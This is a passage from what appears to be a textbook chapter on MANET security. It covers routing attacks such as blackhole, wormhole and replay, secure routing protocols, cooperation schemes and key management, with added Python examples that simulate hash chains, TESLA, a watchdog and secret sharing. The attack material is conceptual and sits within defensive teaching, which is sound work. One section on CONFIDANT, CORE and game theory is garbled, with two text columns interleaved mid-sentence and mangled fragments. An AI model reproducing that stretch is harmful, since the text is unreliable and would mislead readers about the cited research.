A malicious node can advertise falsified routing information by tampering with fields such as source, destination, metric, and so forth. For example, an attacker can claim a falsified short distance by advertising zero or a very small metric, either in order to attract and later drop the traffic originally destined to other nodes (blackhole attack), or in order to include itself on the path so that it can analyze the communications. Another example is that an attacker can use forged routing packets to create a routing loop, causing packets to circulate in the network without reaching their destinations. Such malicious attacks should be distinguished from nodes unknowingly providing incorrect or obsolete routing information, which may result from topology change. This is not a trivial task due to the nature of ad hoc networks.

Another type of attack, the wormhole attack (Hu, Perrig, & Johnson, 2003a), happens when two malicious nodes establish a link via a private network connection and forward all the received traffic to each other. In this type of attack the normal flow of routing packets is short-circuited, and a virtual vertex cut of nodes that the attackers control can be created in the network.

An adversary can also mount a replay attack by sending an old advertisement in an attempt to get other nodes to update their routing tables with stale routes. Sequence numbers are usually used to prevent packets from being repeatedly passed on.

A denial-of-service (DoS) attack can be attempted by injecting packets into the network, which may cause excessive consumption of resources. One special type of DoS attack, the jellyfish attack (Aad, Hubaux, & Knightly, 2004), is to hold packets unnecessarily for some amount of time before forwarding them. The jellyfish attack can cause high end-to-end delay and delay jitter. The rushing attack (Hu, Perrig, & Johnson, 2003b) takes advantage of the suppression mechanisms that are used by on-demand routing protocols to prevent duplicate routing requests from being spread: the suppression mechanism processes only the first request while skipping the duplicate ones, so an attacker whose copy of the request arrives first ends up on the discovered route. All these attacks are difficult to detect in MANETs due to the inherent volatility of the communication channels.

Besides failing to follow routing protocols, which is sometimes referred to as routing attacks, an attacker may also target the data messages traversing an established path. A misbehaving node may maliciously alter or drop data packets in transit, which is called a packet forwarding attack. These two types of attacks differ because routing packets and data packets differ. Usually, routing packets are altered as they circulate around the network (for example, in the metric field that states the shortest distance to the destination). Thus routing packets are mutable, and their transmission is hop-by-hop. Data packets are nonmutable, because the data are not changed during transmission (except for some particular fields in the header), and their transmission is therefore end-to-end. The integrity of data packets can be protected by traditional cryptographic operations, while routing packets are hard to protect.

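The replay and blackhole attacks just described, run against the freshness rule of a sequence-numbered distance-vector table, as an added Python example. This is a simplification written for this page, not the code of AODV or DSDV; the advertisements are constructed, and the update rule is the usual one of accepting a higher destination sequence number, or an equal one with a smaller metric. The use_seq flag switches the sequence-number comparison off so the two variants can be compared.

```python
"""Freshness rule of a sequence-numbered distance-vector table and the two
attacks from the text, replay and blackhole (added example; a simplification
of the DSDV/AODV rule, not either protocol's code)."""
from dataclasses import dataclass
from typing import Dict, Optional


@dataclass(frozen=True)
class Advert:
    dest: str   # destination the advertisement is about
    seq: int    # destination sequence number carried by the advertisement
    hops: int   # metric: the mutable field an attacker can understate
    via: str    # neighbour that sent the advertisement


class RoutingTable:
    def __init__(self, use_seq: bool = True) -> None:
        self.use_seq = use_seq
        self.routes: Dict[str, Advert] = {}

    def update(self, adv: Advert) -> bool:
        """Accept an advertisement that is fresher (higher seq), or equally
        fresh and shorter. With use_seq=False only the metric is compared,
        which is the weakness sequence numbers were introduced to fix."""
        cur = self.routes.get(adv.dest)
        if cur is None:
            accept = True
        elif self.use_seq:
            accept = adv.seq > cur.seq or (adv.seq == cur.seq and adv.hops < cur.hops)
        else:
            accept = adv.hops < cur.hops
        if accept:
            self.routes[adv.dest] = adv
        return accept

    def next_hop(self, dest: str) -> Optional[str]:
        route = self.routes.get(dest)
        return route.via if route else None


def scenario(use_seq: bool = True) -> dict:
    """Constructed advertisements for destination D as seen by one node."""
    table = RoutingTable(use_seq)
    table.update(Advert("D", seq=10, hops=3, via="B"))      # legitimate route
    # Replay: an advertisement captured earlier (older seq, shorter metric)
    # re-sent unchanged by attacker X.
    replay_taken = table.update(Advert("D", seq=7, hops=1, via="X"))
    # Blackhole: attacker M fabricates a far higher seq and a zero metric so
    # that every packet for D is handed to it, then drops the packets.
    blackhole_taken = table.update(Advert("D", seq=10 + 1000, hops=0, via="M"))
    return {"replay_taken": replay_taken,
            "blackhole_taken": blackhole_taken,
            "next_hop": table.next_hop("D")}
```

Run scenario(True) and scenario(False) side by side. The sequence number stops the stale advertisement, as the text says, but nothing in the rule binds the sequence number or the metric to the destination, so the fabricated advertisement with a high sequence number and zero metric is accepted in both cases and all traffic for D is handed to M. Closing that gap is what the signature over the nonmutable fields and the hash chain over the hop count, described in the next subsection, are for.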

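The one-way hash chain described under Security Solutions for MANETs above, and its use to authenticate the mutable hop-count field hop by hop (the mechanism SAODV applies to AODV RREQ and RREP messages), worked in Python. This is an added example, not code from the chapter or from any SAODV implementation: H is taken to be SHA-256, and the chain length and the RREQ dictionary fields (hop_count, max_hop_count, top_hash, hash) are assumptions of the example. The originator's signature, which in the real protocol covers max_hop_count and top_hash, is left out.

```python
"""One-way hash chain (added example): build it, authenticate released
elements against a trusted anchor, and use it to protect a hop count."""
import hashlib
import os
from typing import List, Optional


def H(value: bytes) -> bytes:
    """The one-way function of the text; SHA-256 is an assumption here."""
    return hashlib.sha256(value).digest()


def build_chain(n: int, seed: Optional[bytes] = None) -> List[bytes]:
    """Return [h0, h1, ..., hn] with h0 the random seed and h_{i+1} = H(h_i)."""
    chain = [seed if seed is not None else os.urandom(32)]
    for _ in range(n):
        chain.append(H(chain[-1]))
    return chain


def authenticate(candidate: bytes, i: int, trusted: bytes, j: int) -> bool:
    """Verify a claimed h_i against an already trusted h_j with j >= i: apply
    H to the candidate j - i times and compare. The trusted element is only
    compared against, never hashed; H cannot be run backwards."""
    if j < i:
        raise ValueError("the trusted element must not lie earlier in the chain")
    value = candidate
    for _ in range(j - i):
        value = H(value)
    return value == trusted


# Hop-count protection in the SAODV style. max_hop_count and top_hash are the
# nonmutable part (signed by the originator in the real protocol, omitted
# here); hop_count and hash are the mutable, hop-by-hop part.

def new_rreq(chain: List[bytes]) -> dict:
    """Constructed RREQ: hop count 0, carrying h0, anchored to hn (assumed fields)."""
    n = len(chain) - 1
    return {"hop_count": 0, "max_hop_count": n,
            "top_hash": chain[n], "hash": chain[0]}


def forward(rreq: dict) -> dict:
    """What an honest relay does: one more hop, one more application of H."""
    return {**rreq, "hop_count": rreq["hop_count"] + 1, "hash": H(rreq["hash"])}


def hop_count_ok(rreq: dict) -> bool:
    """Hashing the carried element (max_hop_count - hop_count) times must yield top_hash."""
    return authenticate(rreq["hash"], rreq["hop_count"],
                        rreq["top_hash"], rreq["max_hop_count"])


def demo(n: int = 8) -> dict:
    chain = build_chain(n)
    # Release order for authentication is hn (the anchor) first, then
    # h_{n-1}, h_{n-2}, ...; every later element is checked against the anchor.
    chain_ok = all(authenticate(chain[i], i, chain[n], n) for i in range(n - 1, -1, -1))
    forged_ok = authenticate(os.urandom(32), n - 1, chain[n], n)

    three_hops = forward(forward(forward(new_rreq(chain))))
    closer = {**three_hops, "hop_count": 2}   # relay claims to be one hop nearer
    return {"chain_ok": chain_ok, "forged_ok": forged_ok,
            "honest_ok": hop_count_ok(three_hops),
            "decrement_ok": hop_count_ok(closer)}
```

The check always hashes the candidate, never the trusted anchor. The decrement test fails because producing the element that belongs to a smaller hop count would mean inverting H. The scheme cannot, however, detect a relay that forwards the message without incrementing hop_count and without applying H, since the pair it passes on is still consistent; that is a known limit of hop-count hash chains, and it is why max_hop_count and top_hash must be covered by the end-to-end signature so that at least the anchor and the bound cannot be replaced.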

Secure Routing Protocols

Sanzgiri, Dahill, Levine, Shields, and Royer (2002) propose authenticated routing for ad hoc networks (ARAN), a secure protocol that provides authentication and nonrepudiation for route discovery and maintenance. ARAN requires that each node have a certificate signed by a trusted certificate server. It introduces much overhead by requiring every node that forwards a route request to sign the request, and is therefore vulnerable to DoS attacks.

Papadimitratos and Haas (2002) propose the secure routing protocol (SRP), which can be applied to DSR. SRP requires a security association between the source and destination nodes and uses the association to authenticate route request and route reply messages. Malicious modifications of the routing messages are detected at the destination. SRP does not attempt to secure route error messages, so those messages are subject to forgery.

Ariadne was developed by Hu, Johnson, and Perrig (2002) based on DSR. Ariadne can authenticate routing messages using one of three schemes: shared secret keys between all pairs of nodes, shared secret keys between communicating nodes combined with broadcast authentication, or digital signatures. Ariadne uses symmetric cryptographic primitives, with TESLA (timed efficient stream loss-tolerant authentication) (Perrig, Canetti, Song, & Tygar, 2001; Perrig, Canetti, Tygar, & Song, 2002), a broadcast authentication scheme that requires time synchronization. Some researchers argue that time synchronization is an unrealistic requirement for ad hoc networks.

Hu, Perrig, and Johnson (2002) designed the secure efficient ad hoc distance vector routing protocol (SEAD) for DSDV to protect against DoS attacks, replay attacks, and wormhole attacks. SEAD also uses hash chains to authenticate metrics and sequence numbers. SEAD does not use asymmetric cryptographic operations, so the authentication overhead is kept at a reasonable level.

Zapata (2006) proposed secure AODV (SAODV), a secure extension of the AODV routing protocol that can be used to protect route discovery. SAODV uses a digital signature to authenticate in an end-to-end manner and to protect the integrity of the nonmutable fields in routing messages (such as source, destination, sequence number, etc.). A hash chain is used to authenticate, in a hop-by-hop manner, the hop-count information, which is the only mutable field in the messages. A signature extension carrying the signature and the hash chain values is added to the original AODV RREQ and RREP messages for authentication.

Hu et al. (2003a) also designed a mechanism, called packet leashes, to defend against the wormhole attack. However, the mechanism requires clock synchronization. Song, Qian, and Li (2005) therefore proposed a statistical approach that eliminates the need for clock synchronization. An approach to defend against rushing attacks has also been proposed (Hu et al., 2003b).

Cooperation in MANETs

The presence of selfish nodes that do not respect the routing or MAC protocols can cause performance degradation or even network partition. This subsection discusses the approaches that have been proposed to solve this problem. Most of these approaches are used at the network layer, but some can also be applied to the MAC layer with proper modifications.

1. One approach is to detect misbehaving nodes and then avoid such nodes in routing.

Marti, Giuli, Lai, and Baker (2000) propose two techniques, watchdog and pathrater, to detect the presence of nodes that have agreed to forward packets but fail to do so. The watchdog, run by each node on a path, can identify a misbehaving node by monitoring the next hop to ensure that the packets are passed on in a timely manner. Although it can detect misbehaviors at the forwarding level, the watchdog might not be able to detect them in the presence of collisions, colluding attacks, and partial dropping. The pathrater helps to avoid the misbehaving nodes. Each node maintains a rating for every other node in the network. The rating is incremented if the node is on an actively used path, and decremented on a broken path. A node calculates a path metric by averaging the ratings of the nodes on the path.

2. Another approach is to design protocols that stimulate cooperation by penalizing misbehavior or rewarding the forwarding of packets for other nodes' benefit.

Buttyan and Hubaux (2000, 2003) propose a protocol that stimulates packet forwarding. It requires a node to pass all packets to its security module, which maintains a counter called the nuglet counter. The counter is decreased whenever the node sends a packet as the originator, and increased when the node forwards a packet for another node. Since the value of the counter must remain positive, a node needs to maintain a balance on the counter by forwarding packets for the benefit of others in order to have its own packets sent. To prevent a node from illegitimately increasing its own counter, the counter is required to be maintained by a trusted and tamper-resistant hardware module (such as a smart card).

CONFIDANT (cooperation of nodes fairness in dynamic ad-hoc networks) (Buchegger & Boudec, 2001, 2002a, 2002b) was proposed to detect, discourage, and stop selfish misbehaviors. CONFIDANT consists of four components: a monitor to observe the neighborhood; a trust manager to deal with incoming and outgoing warning messages; a reputation system to maintain reputation records based on own experiences, vicinity observations, and reports by other nodes; and a path manager that ranks paths and reacts to changes in reputation. It applies different weights to subjective reputation (own observations), indirect reputation (positive reputation reported by others), and functional reputation (the subjective and indirect reputation calculated with respect to different functions). At each node, reputation values are stored in a reputation table, and a watchdog mechanism is used to detect misbehaving nodes.

Sprite is a cheat-proof, credit-based system (Zhong, Chen, & Yang, 2003), which also requires that nodes earn enough credits by forwarding for other nodes in order to send their own packets. To prove that it has received or forwarded a message, a node keeps a receipt of the message and uploads the receipt to a credit clearance service (CCS). To motivate nodes to report receipts, the CCS gives more credit to a node that forwards a message than to a node that does not. Proper actions are taken to prevent cheating: if a message is not received by the destination, the credits to the intermediate nodes are greatly reduced, and therefore the benefit of falsely reporting a receipt by an intermediate node is reduced too. The approach needs a centralized trusted entity, which is hard to provide in MANETs.

Some other interesting approaches that use punishment or rewarding systems can be found in Mohan and Joiner (2004) and Salem, Buttyan, Hubaux, and Jakobsson (2003).

3. Game-theoretic techniques (Jones, 2000)
and reported records; and a path manager for nodes have also been used to develop protocols for
to adapt their behavior according to the reputa- stimulating cooperation (Anderegg & Eiden-
tion of a node or a path. CONFIDANT takes into benz, 2003; Srinivasan, Nuggehalli, Chiasserini,
consideration the problem of nodes providing false & Rao, 2003).
information to gain good reputation. With a proper These techniques assume that all nodes are self-
weightsystemandamodifiedBayesianestimation ish and rational, that is, they only do things that
procedure, the second-hand information can still are beneficial to themselves and their purpose
speed up the detection while suppressing false to maximize their own utility. Usually noncoop-
positives and negatives. The simulation results erative game model is used in these approaches.
show that the network performance can still be By means of imposing suitable costs on network
good even when half of the network population operation, the game reaches a stable state called
misbehaves. “Nashequilibrium”( Nash,where , ) 059 1 aselfish
CORE is a collaborative reputation mecha- node cannot gain an advantage over well-behaved
nism (Michiardi & Molva, 2002a). Similarly to nodes.
CONFIDANT, CORE also differentiates between
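The watchdog and pathrater described above (Marti et al., 2000), simulated as an added example; this is not code from the paper or from the chapter. The rating constants (a new node starts at 0.5, gains 0.01 per packet on an actively used path up to 0.8, loses 0.05 when a path through it breaks, and is set to -100 once the watchdog flags it) and the miss threshold are assumptions made for the illustration, as are the node names and the traffic pattern. The scenario also shows the partial-dropping limitation the text mentions: a next hop that drops only one packet in five stays below the watchdog's threshold.

```python
"""Watchdog + pathrater simulation (added illustration, not Marti et al.'s code).

The watchdog keeps a buffer of packets it has handed to a next hop and expects
to overhear that hop retransmit; when its timer expires, every packet still in
the buffer counts as a missed forward for that hop.  The pathrater keeps a
rating per node and picks the route with the highest average rating.
Constants below are assumptions for this example.
"""
from dataclasses import dataclass, field

MISS_THRESHOLD = 3        # missed forwards before a next hop is reported (assumed)
FLAGGED_RATING = -100.0   # rating given to a node the watchdog reported (assumed)


@dataclass
class Watchdog:
    pending: dict = field(default_factory=dict)   # packet id -> next hop
    misses: dict = field(default_factory=dict)    # next hop -> missed forwards
    flagged: set = field(default_factory=set)

    def sent(self, pkt_id, next_hop):
        """Buffer a packet we expect to overhear `next_hop` forward."""
        self.pending[pkt_id] = next_hop

    def overheard(self, pkt_id):
        """We heard the next hop retransmit the packet: drop it from the buffer."""
        self.pending.pop(pkt_id, None)

    def timeout(self):
        """Timer expiry: everything still buffered was not forwarded in time."""
        for pkt_id, hop in list(self.pending.items()):
            self.misses[hop] = self.misses.get(hop, 0) + 1
            if self.misses[hop] >= MISS_THRESHOLD:
                self.flagged.add(hop)
            del self.pending[pkt_id]
        return set(self.flagged)


@dataclass
class Pathrater:
    ratings: dict = field(default_factory=dict)

    def rating(self, node):
        return self.ratings.get(node, 0.5)          # neutral start (assumed)

    def path_used(self, path):
        for node in path:
            self.ratings[node] = min(0.8, self.rating(node) + 0.01)

    def path_broken(self, path):
        for node in path:
            self.ratings[node] = max(0.0, self.rating(node) - 0.05)

    def misbehaving(self, node):
        self.ratings[node] = FLAGGED_RATING

    def path_metric(self, path):
        """Average of the ratings of the nodes on the path (the sender excluded)."""
        return sum(self.rating(node) for node in path) / len(path)

    def best_path(self, paths):
        return max(paths, key=self.path_metric)


def simulate():
    """Constructed scenario: A reaches D via B or via C and E.  B forwards two
    of five packets; F (another next hop) forwards four of five."""
    wd, pr = Watchdog(), Pathrater()
    via_b, via_c = ("B", "D"), ("C", "E", "D")
    for pkt_id in range(1, 6):               # five packets sent via B
        wd.sent(pkt_id, "B")
        pr.path_used(via_b)
        if pkt_id <= 2:                      # B forwards only the first two
            wd.overheard(pkt_id)
    for pkt_id in range(11, 16):             # five packets sent via F
        wd.sent(pkt_id, "F")
        if pkt_id != 13:                     # F silently drops one: partial dropping
            wd.overheard(pkt_id)
    flagged = wd.timeout()
    for node in flagged:
        pr.misbehaving(node)
    return pr, flagged, pr.best_path([via_b, via_c])


if __name__ == "__main__":
    pr, flagged, chosen = simulate()
    print("flagged:", flagged, "chosen path:", chosen)
```

Running `simulate()` flags B, leaves F unflagged (one miss is below the threshold), and moves A's traffic onto the C, E path because B's -100 rating drags the average of the B, D path far below the alternative.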


Anderegg and Eidenbenz (2003) provide a game-theoretic approach whose goal is to achieve truthfulness and cost-efficiency for routing protocols in MANETs. The approach pays the forwarding nodes a premium over their actual costs for forwarding data packets. The authors show that the total overpayment is relatively small.

Although protocols developed with game-theoretic techniques may be resilient to misbehavior, they may not achieve the same performance as protocols developed under the assumption that all nodes are well-behaved.

Authentication and Key Management in MANETs

Authentication and key management are essential problems for MANET security.

Authentication in MANETs

To date, a number of authentication protocols have been proposed for MANETs (Balfanz, Smetters, Stewart, & Wong, 2002; Lu & Pooch, 2005; Perrig, Canetti, Tygar, & Song, 2000; Venkatraman & Agrawal, 2000; Weimerskirch & Thonet, 2001).

Stajano and Anderson (1999) propose an approach for ad hoc networks of wireless devices: secure transient association. Its purpose is to provide a transient association between a controller and a peripheral, which is essential for ad hoc authentication. The idea comes from the biological fact that a duckling emerging from its egg recognizes the first moving object it sees as its mother. Similarly, the approach defines that a device recognizes the first entity that sends it a secret key as its owner. Once this ownership has been established, the relationship lasts for the rest of the node's life.

Perrig et al. (2001, 2002) propose a broadcast authentication scheme, TESLA, which uses a one-way key chain with delayed key disclosure. TESLA first bootstraps an authentic key of the one-way key chain between the sender and its receivers, and then broadcasts authenticated packets, disclosing each key only after a delay. The delayed disclosure prevents a malicious node from using an already disclosed key to forge packets with valid authentication information against a node that has been slow to receive the newest key: a receiver accepts a packet only if it arrived before the sender could have disclosed the key that authenticates it, and verifies the packet once that key is disclosed. Authentication techniques that use one-way hash chain keys can tolerate packet loss and have the advantage of low overhead. TESLA has been adopted by many approaches to authenticate neighboring communications in MANETs.

Zhu, Xu, Setia, and Jajodia (2003) propose a lightweight hop-by-hop authentication protocol (LHAP), in which every node authenticates all packets received from its neighbors before forwarding them. LHAP also uses one-way hash chains, like TESLA, but without delayed key disclosure. LHAP uses a TRAFFIC chain (a one-way hash chain) to authenticate packets, and a TESLA chain to authenticate the TRAFFIC keys. Its security properties and performance are analyzed; the analysis shows that LHAP is lightweight and practical.
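A runnable sketch of the TESLA mechanism described above, added here as an example; it is not the chapter's code and not Perrig et al.'s implementation. It assumes perfectly synchronised interval clocks (the real protocol bounds the clock error and folds it into the check), a disclosure delay of one interval, and a packet layout of our own choosing (interval index, message, MAC, disclosed key). The constructed exchange loses one packet, which the receiver tolerates by hashing the next disclosed key back along the chain, and shows both ways a forgery fails: a packet for an interval whose key may already be public is refused on arrival, and a packet for the current interval built with an old key is refused once the real key is disclosed.

```python
"""TESLA-style broadcast authentication: one-way key chain, delayed disclosure.
Added illustration (not Perrig et al.'s code); clock sync and packet format
are simplifying assumptions.
"""
import hashlib
import hmac
import os

DELAY = 1          # the key of interval i is disclosed in interval i + DELAY (assumed)
HASH = "sha256"


def h(key: bytes) -> bytes:
    """One-way function used to build and to verify the key chain."""
    return hashlib.new(HASH, key).digest()


def make_chain(n: int) -> list:
    """Return [K_0, K_1, ..., K_n] with K_{i-1} = H(K_i); K_0 is the commitment."""
    chain = [os.urandom(32)]                  # K_n, chosen at random
    for _ in range(n):
        chain.append(h(chain[-1]))
    return chain[::-1]


class Sender:
    def __init__(self, n: int):
        self.keys = make_chain(n)

    def commitment(self) -> bytes:
        return self.keys[0]                   # must reach receivers authentically

    def send(self, i: int, msg: bytes) -> dict:
        """Packet of interval i: MAC under K_i, plus K_{i-DELAY} disclosed."""
        return {"i": i, "msg": msg,
                "mac": hmac.new(self.keys[i], msg, HASH).digest(),
                "disclosed": self.keys[i - DELAY] if i >= DELAY else None}


class Receiver:
    def __init__(self, commitment: bytes):
        self.known = {0: commitment}          # interval -> verified key
        self.latest = 0
        self.buffer = []                      # safe packets waiting for their key
        self.authenticated = []               # (interval, msg) accepted
        self.rejected = []                    # (interval, reason)

    def receive(self, pkt: dict, now: int) -> None:
        # Security condition: the sender must not yet have disclosed K_i.
        if now >= pkt["i"] + DELAY:
            self.rejected.append((pkt["i"], "key may already be disclosed"))
            return
        if pkt["disclosed"] is not None:
            self._learn(pkt["i"] - DELAY, pkt["disclosed"])
        self.buffer.append(pkt)
        self._drain()

    def _learn(self, idx: int, key: bytes) -> None:
        """Verify a disclosed key against the chain; recover skipped keys too."""
        if idx <= self.latest:
            return
        probe = key
        for _ in range(idx - self.latest):
            probe = h(probe)
        if not hmac.compare_digest(probe, self.known[self.latest]):
            return                            # not on the chain: ignore it
        for j in range(idx, self.latest, -1):  # keys of lost packets are derived
            self.known[j] = key
            key = h(key)
        self.latest = idx

    def _drain(self) -> None:
        waiting = []
        for pkt in self.buffer:
            k = self.known.get(pkt["i"])
            if k is None:
                waiting.append(pkt)
            elif hmac.compare_digest(hmac.new(k, pkt["msg"], HASH).digest(), pkt["mac"]):
                self.authenticated.append((pkt["i"], pkt["msg"]))
            else:
                self.rejected.append((pkt["i"], "bad MAC"))
        self.buffer = waiting


def run_scenario() -> Receiver:
    """Constructed exchange: packet 2 is lost, then two forgeries are attempted."""
    sender = Sender(n=4)
    rx = Receiver(sender.commitment())
    p1, p2, p3, p4 = (sender.send(i, b"route update %d" % i) for i in range(1, 5))
    rx.receive(p1, now=1)                     # K_1 unknown yet: buffered
    rx.receive(p3, now=3)                     # p2 lost; K_2 disclosed, K_1 = H(K_2)
    k2 = p3["disclosed"]
    forged_old = {"i": 1, "msg": b"forged 1", "disclosed": None,
                  "mac": hmac.new(h(k2), b"forged 1", HASH).digest()}
    rx.receive(forged_old, now=3)             # refused: K_1 could be public by now
    forged_now = {"i": 3, "msg": b"forged 3", "disclosed": k2,
                  "mac": hmac.new(k2, b"forged 3", HASH).digest()}
    rx.receive(forged_now, now=3)             # buffered; fails once K_3 is known
    rx.receive(p4, now=4)                     # discloses K_3: p3 accepted
    return rx
```

After `run_scenario()` the receiver has authenticated packets 1 and 3 (packet 1 despite the loss of packet 2), rejected the stale forgery on the timing condition and the fresh one on its MAC, and still holds packet 4 until K_4 arrives. The two checks are independent: the timing condition protects against keys that are public, the MAC against keys that are wrong.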


Key Management in MANETs

Key management is an essential cryptographic primitive on which the other security primitives are built. In traditional wired networks, centralized key management approaches are usually used. However, an ad hoc network is peer-to-peer and has no central administration point. In addition, a central authority may become a single point of failure under heavy workload, as well as an easy target for malicious attacks. Therefore, recent research has focused on key management approaches that are not only efficient but also work on a dynamic network topology and tolerate link failures.

A partially or fully distributed certificate authority is commonly used for key management in MANETs.

Zhou and Haas (1999) propose a distributed public-key management service for ad hoc networks. It is assumed that the communication channels are reliable, and that all nodes in the system know the service's public key and trust any certificate signed with the corresponding private key. An (n, t + 1) threshold cryptography scheme is used to distribute the private key, which is divided into n shares. The n parties thus share the ability to perform a cryptographic operation (e.g., creating a digital signature), and any t + 1 of them can perform the operation jointly. To sign a certificate, each server produces a partial signature for the certificate using its share and submits the partial signature to a combiner, which generates the entire signature. In this way, the system can tolerate up to t (t < n) compromised servers.

A similar approach proposed by Kong, Zerfos, Luo, Lu, and Zhang (2001) provides a fairer distribution by allowing every node to carry a secret share. Any t + 1 nodes in the vicinity of the requesting node can jointly provide the complete service, which increases the availability and scalability of the service. However, the scheme is not secure if an attacker can compromise an arbitrary set of t + 1 nodes, and thus collect enough shares to reconstruct the system's private key.

In both Zhou and Haas (1999) and Kong et al. (2001), a trusted authority is needed to initialize the first t + 1 nodes, which is difficult in MANETs. In addition, it is still not clear how to determine the number t initially and how to adapt t as n changes.
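The (n, t + 1) sharing that both distributed-CA designs above rest on, shown as an added example (not code from Zhou and Haas or from Kong et al.). The service's private key is shared with Shamir's scheme over a prime field; the prime and the certificate bytes are constructed for the illustration. One simplification to keep in mind: the real schemes combine partial signatures so that the key is never reassembled anywhere, whereas the "combiner" here reconstructs the key from t + 1 shares and signs with it. That is exactly why the Kong et al. caveat matters, and the example shows it: any t + 1 shares, not just a designated set, give the whole key, while t shares are consistent with every possible key.

```python
"""Shamir (n, t+1) secret sharing of a CA signing key (added illustration).
The prime P and all sample data are constructed for this example."""
import hmac
import secrets

P = 2**127 - 1     # prime field for the shares (a Mersenne prime; assumed choice)


def split_secret(secret: int, n: int, t: int) -> list:
    """Shares (x, f(x)) of a random degree-t polynomial with f(0) = secret.
    Any t+1 shares determine f; any t shares determine nothing about f(0)."""
    coeffs = [secret] + [secrets.randbelow(P) for _ in range(t)]

    def f(x):
        return sum(c * pow(x, k, P) for k, c in enumerate(coeffs)) % P

    return [(x, f(x)) for x in range(1, n + 1)]


def lagrange(points: list, x: int) -> int:
    """Evaluate at x the unique polynomial through `points` over GF(P)."""
    total = 0
    for i, (xi, yi) in enumerate(points):
        num = den = 1
        for j, (xj, _) in enumerate(points):
            if i != j:
                num = num * ((x - xj) % P) % P
                den = den * ((xi - xj) % P) % P
        total = (total + yi * num * pow(den, P - 2, P)) % P
    return total


def reconstruct(shares: list) -> int:
    """The combiner's step in this simplified example: recover f(0)."""
    return lagrange(shares, 0)


def sign_certificate(key: int, cert: bytes) -> bytes:
    """Stand-in for the CA signature: an HMAC under the (reconstructed) key."""
    return hmac.new(key.to_bytes(16, "big"), cert, "sha256").digest()


def any_secret_fits(t_shares: list, guess: int) -> bool:
    """With only t shares every candidate secret is consistent: the degree-t
    polynomial through the shares and (0, guess) reproduces all t shares."""
    poly = t_shares + [(0, guess)]
    return all(lagrange(poly, x) == y for x, y in t_shares)


def demo(n: int = 5, t: int = 2) -> dict:
    key = secrets.randbelow(P)                       # the service's private key
    shares = split_secret(key, n, t)                 # one share per server/node
    cert = b"subject=node-17;pubkey=constructed-sample;valid=2007"   # constructed
    combined = reconstruct(shares[:t + 1])          # combiner fed by t+1 servers
    sig = sign_certificate(combined, cert)
    return {
        "t_plus_1_reconstructs": combined == key,
        # Kong et al.'s caveat: *any* t+1 compromised nodes yield the key.
        "any_t_plus_1_reconstructs": reconstruct(shares[2:t + 3]) == key,
        # t shares: interpolation yields an unrelated value (except w.p. 1/P).
        "t_shares_reconstruct": reconstruct(shares[:t]) == key,
        "t_shares_fit_any_guess": any_secret_fits(shares[:t], (key + 1) % P),
        "signature_verifies": hmac.compare_digest(sig, sign_certificate(key, cert)),
    }
```

`demo()` returns True for reconstruction from the first t + 1 shares and from a different set of t + 1 shares, False for reconstruction from t shares, and True for the check that t shares fit an arbitrary wrong guess, which is the information-theoretic guarantee that makes "tolerates up to t compromised servers" precise.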
Capkun, Buttyan, and Hubaux (2003) propose a fully self-organized public-key management system that does not require any trusted authority, even in the system initialization phase. Like PGP (pretty good privacy) (Zimmermann, 1995), the scheme lets a node create its own public and private keys. But the keys and certificates are not stored in centralized certificate repositories; instead, they are stored at the nodes in a fully distributed manner. When a node wants to obtain the public key of another node, it acquires a chain of valid public-key certificates. The first certificate of the chain is verified directly with a public key the node trusts. Each subsequent certificate is then verified with the public key contained in the previous certificate of the chain, and the last certificate contains the public key of the target user. The system allows the nodes in the network to perform key authentication based only on their local information.

However, Chan (2004) argues that although some protocols are fully distributed and self-organized without needing any trusted third party (TTP), they are not robust to dynamic topologies or sporadic links because they depend on the routing structure that was established initially. Chan (2004) proposes a distributed symmetric key management scheme for MANETs, which uses a fully distributed and self-organized key pre-distribution scheme (DKPS) without relying on TTPs or infrastructure support. DKPS has three phases, namely distributed key selection (DKS), secure shared-key discovery (SSD), and key exclusion property testing (KEPT). In the DKS phase, each node randomly picks keys from a publicly known universal set to form its key ring, in which the exclusion property is to be ensured in order to avoid collisions. As soon as each node shares a common key with some other node, it enters the SSD phase and broadcasts its key identifiers to the others. To guarantee that nodes can let each other know which keys they have in common without revealing the keys to others, the author proposes MRS (modified Rivest's scheme) and builds SSD on MRS. MRS is based on the work of Rivest, Adleman, and Dertouzos (1978), a special class of encryption functions that allow operations on encrypted data without knowledge of the decryption functions. In the KEPT phase, a node tests whether its set of keys satisfies the exclusion property.

Crepeau and Davis (2003) provide a certificate revocation scheme that can defend against attacks in which nodes maliciously accuse other nodes, and against the use of revoked certificates to access network services.

Many researchers are still making efforts to find a secure yet cost-efficient key distribution approach.
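The certificate-chain walk of the self-organized scheme above (Capkun et al., 2003), as an added example that is not the paper's code. The signature primitive is textbook RSA over fixed, publicly known Mersenne primes so that the block runs without third-party libraries; those keys are constructed and trivially factorable, and stand in for whatever real scheme the nodes would use. The verifier rebuilds the signed bytes from the certificate's own fields before checking the signature, which is what makes the key-substitution case in the scenario fail.

```python
"""PGP-style certificate chain verification from a locally trusted key
(added illustration, not Capkun et al.'s code).  RSA keys below are toy
keys built from known Mersenne primes: constructed, insecure, example-only."""
import hashlib

E = 65537
_PRIMES = [2**31 - 1, 2**61 - 1, 2**89 - 1, 2**107 - 1,
           2**127 - 1, 2**521 - 1, 2**607 - 1, 2**1279 - 1]


def keypair(i: int):
    """Textbook RSA keypair number i: ((n, e), (n, d))."""
    p, q = _PRIMES[2 * i], _PRIMES[2 * i + 1]
    n = p * q
    return (n, E), (n, pow(E, -1, (p - 1) * (q - 1)))


def _digest(data: bytes, n: int) -> int:
    return int.from_bytes(hashlib.sha256(data).digest(), "big") % n


def sign(priv, data: bytes) -> int:
    n, d = priv
    return pow(_digest(data, n), d, n)


def verify(pub, data: bytes, sig: int) -> bool:
    n, e = pub
    return pow(sig, e, n) == _digest(data, n)


def cert_body(issuer: str, subject: str, pub) -> bytes:
    """The bytes an issuer signs: who certifies whom with which key."""
    return f"{issuer} certifies {subject} key {pub[0]}:{pub[1]}".encode()


def make_cert(issuer: str, issuer_priv, subject: str, subject_pub) -> dict:
    return {"issuer": issuer, "subject": subject, "pub": subject_pub,
            "sig": sign(issuer_priv, cert_body(issuer, subject, subject_pub))}


def verify_chain(trusted_name: str, trusted_pub, chain: list, target: str):
    """Check the first certificate with the key this node already trusts, each
    later one with the public key carried by the previous certificate.  The
    body is rebuilt from the fields, so a swapped key cannot ride on an
    untouched signature.  Returns the target's public key, or None."""
    name, pub = trusted_name, trusted_pub
    for cert in chain:
        body = cert_body(cert["issuer"], cert["subject"], cert["pub"])
        if cert["issuer"] != name or not verify(pub, body, cert["sig"]):
            return None
        name, pub = cert["subject"], cert["pub"]
    return pub if name == target else None


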